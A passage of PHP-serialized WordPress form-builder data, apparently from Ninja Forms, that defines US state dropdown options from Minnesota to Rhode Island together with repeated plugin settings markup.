dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:24;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Minnesota\";s:5:\"value\";s:2:\"MN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:25;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:11:\"Mississippi\";s:5:\"value\";s:2:\"MS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:26;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Missouri\";s:5:\"value\";s:2:\"MO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:27;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Montana\";s:5:\"value\";s:2:\"MT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:28;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Nebraska\";s:5:\"value\";s:2:\"NE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:29;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Nevada\";s:5:\"value\";s:2:\"NV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:30;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"New Hampshire\";s:5:\"value\";s:2:\"NH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:31;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"New Jersey\";s:5:\"value\";s:2:\"NJ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:32;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"New Mexico\";s:5:\"value\";s:2:\"NM\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:33;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"New York\";s:5:\"value\";s:2:\"NY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:34;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:14:\"North Carolina\";s:5:\"value\";s:2:\"NC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:35;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"North Dakota\";s:5:\"value\";s:2:\"ND\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:36;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Ohio\";s:5:\"value\";s:2:\"OH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:37;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Oklahoma\";s:5:\"value\";s:2:\"OK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:38;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Oregon\";s:5:\"value\";s:2:\"OR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:39;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"Pennsylvania\";s:5:\"value\";s:2:\"PA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:40;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"Rhode Island\";s:5:\"value\";s:2:\"RI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 